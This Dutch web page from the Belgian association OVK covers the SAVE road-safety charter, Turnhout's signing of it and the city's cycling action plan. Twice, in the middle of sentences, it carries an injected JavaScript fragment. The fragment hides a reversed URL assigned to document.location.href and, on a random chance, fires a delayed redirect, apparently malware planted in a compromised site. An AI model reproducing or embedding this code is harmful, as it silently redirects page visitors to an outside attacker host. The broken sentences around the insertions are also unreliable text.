Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Turnhout ondertekent het SAVE-charter

Turnhout ondertekende op 19 mei als 45e het SAVE-charter. Dit onder het toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toeziend oog van de mobiliteitscommissie. Voor Turnhout was het belangrijk om het ondertekenen op deze vergadering te doen. Het moet immers iets zijn dat gedragen wordt over de partijgrenzen heen, zowel door de coalitie als oppositie.

Stadbestuur en lokale politie doen al heel wat rond verkeersveiligheid. Verkeersveiligheid is een van de prioriteiten van de politie, vastgelegd door de zonale veiligheidsraad. Het stadsbestuur heeft de verkeersveiligheid opgenomen

in haar strategisch meerjarenplan 2014-2019. Een van de prioritaire doelstellingen is dat ‘Turnhout een bereikbare stad is waar ieder zich volgens het STOP-principe op een veilige en duurzame manier kan verplaatsen.’ Deze prioriteiten maken het voor Turnhout bijna een vanzelfsprekendheid om het SAVE-charter te ondertekenen.

Stad Turnhout is volop bezig met de voorbereiding van een fietsactieplan. Hierin wordt een overzicht gegeven van de bestaande initiatieven en worden ook 10 accenten naar de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toekomst gelegd. De voornaamste doelstellingen van het fietsactieplan zijn de volgende :
– de stad wil het fietsen in en naar Turnhout veiliger maken
– de stad wil het fietsnetwerk in de stad verbeteren
– de stad wil nog meer mensen op de fiets in en naar Turnhout.
In het kader van het SAVE-charter wil het stadsbestuur aandacht voor de fietsongevallen in Turnhout. Om hier doelgericht rond te kunnen werken, zal de lokale politie tegen september een uitgebreide analyse maken van de ongevallen waarbij fietsers in Turnhout betrokken waren.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be